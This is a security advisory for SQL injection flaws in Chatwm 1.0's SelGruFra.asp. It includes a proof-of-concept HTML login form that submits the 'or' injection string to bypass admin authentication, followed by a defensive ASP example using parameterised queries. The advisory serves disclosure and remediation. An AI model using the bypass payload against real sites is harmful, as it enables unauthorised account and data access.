Chatwm SelGruFra.ASP SQL Injection Vulnerabilities
BID:21732
Info
| Bugtraq ID: | 21732 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 24 2006 12:00AM |
| Updated: | Jan 02 2007 06:06PM |
| Credit: | ShaFuq31 is credited with the discovery of this vulnerability. |
| Vulnerable: | Chatwm Chatwm 1.0 |
| Not Vulnerable: | |
Discussion
Chatwm is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
Attackers may use a browser to trigger this issue.
The following example was provided:
Manual connect :
Go to Admin Panel Login -----> http://www.example.com/[path to script]/login.asp
Remote connect :
<title>Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL</title>
<center>ShaFuck31 - LiderHack.Org</center>
<FORM NAME=giris ACTION="http://www.example.com/d/asp/SelGruFra.asp" METHOD=post>
<table align=center>
<td>Kullanici Adi:</td><td><INPUT NAME=txtUse class="input" value="'or'" SIZE=15></td>
</tr><tr>
<td>Sifre:</td><td><INPUT NAME=txtPas TYPE=text class="input" value="'or'" SIZE=15></td>
</tr><tr>
<td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td>
</tr></table></form>
Solution / Fix
Solution:
Currently we are not aware of any solutions for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
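With no vendor fix listed, the usual mitigation for this class of flaw in classic ASP is to bind the posted `txtUse` and `txtPas` values as ADO command parameters instead of building the query from strings. The handler below is an added example, not Chatwm's code: the `Users` table, its `UserName` and `UserPass` columns, `Application("ConnStr")` and `default.asp` are hypothetical names.

```asp
<%@ Language="VBScript" %>
<%
Option Explicit
' Added example, not Chatwm source code. The Users table, its UserName and
' UserPass columns, Application("ConnStr") and default.asp are assumptions.
Const adCmdText = 1, adParamInput = 1, adVarWChar = 202   ' standard ADO values
Const MAX_LEN = 50                                        ' assumed column width

Dim user, pass, conn, cmd, rs, authenticated
user = Request.Form("txtUse")
pass = Request.Form("txtPas")
authenticated = False

' Reject empty or oversized input before touching the database.
If Len(user) > 0 And Len(user) <= MAX_LEN And _
   Len(pass) > 0 And Len(pass) <= MAX_LEN Then

    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open Application("ConnStr")

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' The SQL text is constant; user input never becomes part of it.
    cmd.CommandText = "SELECT UserName FROM Users " & _
                      "WHERE UserName = ? AND UserPass = ?"
    ' Values are bound as typed parameters, so a quote character in either
    ' field is compared as data and cannot change the WHERE clause.
    cmd.Parameters.Append cmd.CreateParameter("u", adVarWChar, adParamInput, MAX_LEN, user)
    cmd.Parameters.Append cmd.CreateParameter("p", adVarWChar, adParamInput, MAX_LEN, pass)

    Set rs = cmd.Execute
    authenticated = Not rs.EOF
    rs.Close : conn.Close
    Set rs = Nothing : Set cmd = Nothing : Set conn = Nothing
End If

If authenticated Then
    Session("User") = user
    Response.Redirect "default.asp"
Else
    ' Same response for every failure; no database error text is echoed.
    Response.Redirect "login.asp"
End If
%>
```

The comparison against `UserPass` assumes the application stores the value it compares directly; if passwords are hashed, bind the hash as the second parameter instead.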